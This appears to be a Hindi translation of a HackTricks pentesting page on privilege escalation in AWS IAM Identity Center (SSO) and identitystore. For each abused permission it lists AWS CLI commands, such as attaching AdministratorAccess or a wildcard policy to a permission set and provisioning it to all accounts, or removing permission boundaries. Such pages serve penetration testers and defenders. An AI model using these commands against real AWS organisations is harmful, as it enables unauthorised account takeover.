AWS - SSO & identitystore Privesc

हैकट्रिक्स का समर्थन करें

AWS आईडेंटिटी सेंटर / AWS SSO

AWS आईडेंटिटी सेंटर / AWS SSO के बारे में अधिक जानकारी के लिए देखें:

AWS - IAM, Identity Center & SSO Enum

ध्यान दें कि डिफ़ॉल्ट रूप से, केवल उपयोगकर्ता जिनके पास प्रबंधन खाता से अनुमतियाँ हैं, वे IAM आईडेंटिटी सेंटर तक पहुंच और इसे नियंत्रित कर सकते हैं। अन्य खातों के उपयोगकर्ताओं को केवल उसकी अनुमति होगी अगर खाता एक अधिकृत प्रशासक है। अधिक जानकारी के लिए दस्तावेज़ देखें।

पासवर्ड रीसेट

इस तरह के मामलों में विशेषज्ञता बढ़ाने का एक आसान तरीका यह हो सकता है कि उस अनुमति को होने दिया जाए जो उपयोगकर्ताओं के पासवर्ड रीसेट करने की अनुमति देता है। दुर्भाग्यवशः, केवल उपयोगकर्ता को उसका पासवर्ड रीसेट करने के लिए ईमेल भेजने की संभावना है, इसलिए आपको उपयोगकर्ता के ईमेल तक पहुंच की आवश्यकता होगी।

identitystore:CreateGroupMembership

इस अनुमति के साथ एक उपयोगकर्ता को एक समूह में सेट करना संभव है ताकि वह समूह की सभी अनुमतियों को अनुग्रहित करें।

aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

इस अनुमति के साथ एक हमलावर उस Permission Set को अतिरिक्त अनुमतियाँ प्रदान कर सकता है जो उसके नियंत्रण में एक उपयोगकर्ता को प्रदान की गई है

# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml

# Content of /tmp/policy.yaml
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

इस अनुमति के साथ एक हमलावर उस Permission Set को अतिरिक्त अनुमतियाँ प्रदान कर सकता है जो उसके नियंत्रण में एक उपयोगकर्ता को प्रदान किया गया है

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

इस अनुमति के साथ एक हमलावर उस Permission Set को अतिरिक्त अनुमतियाँ प्रदान कर सकता है जो उसके नियंत्रण में एक उपयोगकर्ता को प्रदान किया गया है।

इस मामले में इन अनुमतियों का दुरुपयोग करने के लिए आपको जानने की आवश्यकता है कि किसी भी खातों में सभी खातों में एक ग्राहक प्रबंधित नीति का नाम क्या है जिन पर प्रभावित होने वाला है।

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:CreateAccountAssignment

इस अनुमति के साथ एक हमलावर अपने नियंत्रण में एक खाते को एक उपयोगकर्ता को एक अनुमति सेट दे सकता है।

aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>

sso:GetRoleCredentials

उपयोगकर्ता को सौंपे गए किसी भी भूमिका नाम के लिए STS छोटे समयी प्रमाणों को वापस लाता है।

aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>

फिर भी, आपको एक एक्सेस टोकन की आवश्यकता है जिसे मुझे यह नहीं पता कि कैसे प्राप्त करें (कार्य सूची).

sso:DetachManagedPolicyFromPermissionSet

इस अनुमति के साथ एक हमलावर एडवायज़र निर्दिष्ट अनुमति सेट से AWS मैनेज्ड पॉलिसी के संबंध को हटा सकता है। मैनेज्ड पॉलिसी को अलग करने (इनकार पॉलिसी) के माध्यम से अधिक विशेषाधिकार प्रदान किया जा सकता है।

aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

इस अनुमति वाले हमलावर को निर्दिष्ट अनुमति सेट से ग्राहक प्रबंधित नीति के बीच संबंध को हटा सकता है। प्रबंधित नीति को अलग करने (इनकार नीति) के माध्यम से अधिक विशेषाधिकार प्रदान किया जा सकता है।

aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

sso:DeletePermissionBoundaryFromPermissionSet

इस अनुमति के साथ एक हमलावर अनुमति सेट से अनुमति सीमा को हटा सकता है। अनुमति सीमा से दी गई प्रतिबंधनों को हटाकर अधिक विशेषाधिकार प्रदान किया जा सकता है

aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
हैकट्रिक्स का समर्थन करें

Last updated